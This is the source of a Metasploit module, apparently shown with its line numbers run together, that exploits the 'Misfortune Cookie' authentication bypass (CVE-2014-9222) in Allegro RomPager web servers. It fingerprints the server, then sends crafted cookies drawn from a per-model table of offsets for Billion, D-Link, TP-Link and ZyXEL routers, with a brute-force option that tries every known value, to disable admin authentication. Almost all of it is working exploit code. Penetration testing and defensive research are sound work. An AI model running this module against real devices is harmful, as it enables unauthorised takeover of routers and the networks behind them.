Path: blob/master/modules/auxiliary/admin/http/allegro_rompager_auth_bypass.rb
19612 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Auxiliary6include Msf::Exploit::Remote::HttpClient7include Msf::Auxiliary::Report89def initialize(info = {})10super(11update_info(12info,13'Name' => "Allegro Software RomPager 'Misfortune Cookie' (CVE-2014-9222) Authentication Bypass",14'Description' => %q{15This module exploits HTTP servers that appear to be vulnerable to the16'Misfortune Cookie' vulnerability which affects Allegro Software17Rompager versions before 4.34 and can allow attackers to authenticate18to the HTTP service as an administrator without providing valid19credentials.20},21'Author' => [22'Jon Hart <jon_hart[at]rapid7.com>', # metasploit scanner module23'Jan Trencansky <jan.trencansky[at]gmail.com>', # metasploit auxiliary admin module24'Lior Oppenheim' # CVE-2014-922225],26'References' => [27['CVE', '2014-9222'],28['URL', 'https://web.archive.org/web/20191006135858/http://mis.fortunecook.ie/'],29['URL', 'https://web.archive.org/web/20190207102911/http://mis.fortunecook.ie/misfortune-cookie-suspected-vulnerable.pdf'], # list of likely vulnerable devices30['URL', 'https://web.archive.org/web/20190623150837/http://mis.fortunecook.ie/too-many-cooks-exploiting-tr069_tal-oppenheim_31c3.pdf'] # 31C3 presentation with POC31],32'DisclosureDate' => '2014-12-17',33'License' => MSF_LICENSE,34'Notes' => {35'Stability' => [CRASH_SAFE],36'SideEffects' => [IOC_IN_LOGS],37'Reliability' => []38}39)40)4142register_options(43[44OptString.new('TARGETURI', [true, 'URI to test', '/']),45], Exploit::Remote::HttpClient46)4748register_advanced_options(49[50Msf::OptBool.new('ForceAttempt', [ false, 'Force exploit attempt for all known cookies', false ]),51], Exploit::Remote::HttpClient52)53end5455def headers56{57'Referer' => full_uri58}59end6061# List of known values and models62def devices_list63known_devices = {64:'AZ-D140W' =>65{66name: 'Azmoon', model: 'AZ-D140W', values: [67[107367693, 13]68]69},70:'BiPAC 5102S' =>71{72name: 'Billion', model: 'BiPAC 5102S', values: [73[107369694, 13]74]75},76:'BiPAC 5200' =>77{78name: 'Billion', model: 'BiPAC 5200', values: [79[107369545, 9],80[107371218, 21]81]82},83:'BiPAC 5200A' =>84{85name: 'Billion', model: 'BiPAC 5200A', values: [86[107366366, 25],87[107371453, 9]88]89},90:'BiPAC 5200GR4' =>91{92name: 'Billion', model: 'BiPAC 5200GR4', values: [93[107367690, 21]94]95},96:'BiPAC 5200SRD' =>97{98name: 'Billion', model: 'BiPAC 5200SRD', values: [99[107368270, 1],100[107371378, 3],101[107371218, 13]102]103},104:'DSL-2520U' =>105{106name: 'D-Link', model: 'DSL-2520U', values: [107[107368902, 25]108]109},110:'DSL-2600U' =>111{112name: 'D-Link', model: 'DSL-2600U', values: [113[107366496, 13],114[107360133, 20]115]116},117:'TD-8616' =>118{119name: 'TP-Link', model: 'TD-8616', values: [120[107371483, 21],121[107369790, 17],122[107371161, 1],123[107371426, 17],124[107370211, 5],125]126},127:'TD-8817' =>128{129name: 'TP-Link', model: 'TD-8817', values: [130[107369790, 17],131[107369788, 1],132[107369522, 25],133[107369316, 21],134[107369321, 9],135[107351277, 20]136]137},138:'TD-8820' =>139{140name: 'TP-Link', model: 'TD-8820', values: [141[107369768, 17]142]143},144:'TD-8840T' =>145{146name: 'TP-Link', model: 'TD-8840T', values: [147[107369845, 5],148[107369790, 17],149[107369570, 1],150[107369766, 1],151[107369764, 5],152[107369688, 17]153]154},155:'TD-W8101G' =>156{157name: 'TP-Link', model: 'TD-W8101G', values: [158[107367772, 37],159[107367808, 21],160[107367751, 21],161[107367749, 13],162[107367765, 25],163[107367052, 25],164[107365835, 1]165]166},167:'TD-W8151N' =>168{169name: 'TP-Link', model: 'TD-W8151N', values: [170[107353867, 24]171]172},173:'TD-W8901G' =>174{175name: 'TP-Link', model: 'TD-W8901G', values: [176[107367787, 21],177[107368013, 5],178[107367854, 9],179[107367751, 21],180[107367749, 13],181[107367765, 25],182[107367682, 21],183[107365835, 1],184[107367052, 25]185]186},187:'TD-W8901GB' =>188{189name: 'TP-Link', model: 'TD-W8901GB', values: [190[107367756, 13],191[107369393, 21]192]193},194:'TD-W8901N' =>195{196name: 'TP-Link', model: 'TD-W8901N', values: [197[107353880, 0]198]199},200:'TD-W8951ND' =>201{202name: 'TP-Link', model: 'TD-W8951ND', values: [203[107369839, 25],204[107369876, 13],205[107366743, 21],206[107364759, 25],207[107364759, 13],208[107364760, 21]209]210},211:'TD-W8961NB' =>212{213name: 'TP-Link', model: 'TD-W8961NB', values: [214[107369844, 17],215[107367629, 21],216[107366421, 13]217]218},219:'TD-W8961ND' =>220{221name: 'TP-Link', model: 'TD-W8961ND', values: [222[107369839, 25],223[107369876, 13],224[107364732, 25],225[107364771, 37],226[107364762, 29],227[107353880, 0],228[107353414, 36]229]230},231:'P-660R-T3 v3' => # This value works on devices with model P-660R-T3 v3 not P-660R-T3 v3s232{233name: 'ZyXEL', model: 'P-660R-T3', values: [234[107369567, 21]235]236},237:'P-660RU-T3 v2' => # Couldn't verify this238{239name: 'ZyXEL', model: 'P-660R-T3', values: [240[107369567, 21]241]242},243ALL => # Used when `ForceAttempt` === true244{ name: 'Unknown', model: 'Forced', values: [] }245}246# collect all known cookies for a brute force option247all_cookies = []248known_devices.collect { |_, v| v[:values] }.each do |list|249all_cookies += list250end251known_devices[:ALL][:values] = all_cookies.uniq252known_devices253end254255def check_response_fingerprint(res, fallback_status)256fp = http_fingerprint(response: res)257vprint_status("Fingerprint: #{fp}")258# ensure the fingerprint at least appears vulnerable259if %r{RomPager/(?<version>[\d.]+)} =~ fp260vprint_status("#{peer} is RomPager #{version}")261if Rex::Version.new(version) < Rex::Version.new('4.34') && /realm="(?<model>.+)"/ =~ fp262return model263end264end265fallback_status266end267268def run269res = send_request_raw(270'uri' => normalize_uri(target_uri.path.to_s),271'method' => 'GET'272)273model = check_response_fingerprint(res, Exploit::CheckCode::Detected)274if model != Exploit::CheckCode::Detected275devices = devices_list[model.to_sym]276devices = devices_list[:ALL] if devices.nil? && datastore['ForceAttempt']277if !devices.nil?278print_good("Detected device:#{devices[:name]} #{devices[:model]}")279devices[:values].each do |value|280cookie = "C#{value[0]}=#{'B' * value[1]}\x00"281res = send_request_raw(282'uri' => normalize_uri(target_uri.path.to_s),283'method' => 'GET',284'headers' => headers.merge('Cookie' => cookie)285)286if !res.nil? && (res.code <= 302)287print_good('Good response, please check host, authentication should be disabled')288break289else290print_error('Bad response')291end292end293else294print_error("No matching values for fingerprint #{model}")295end296else297print_error('Unknown device')298end299end300end301302303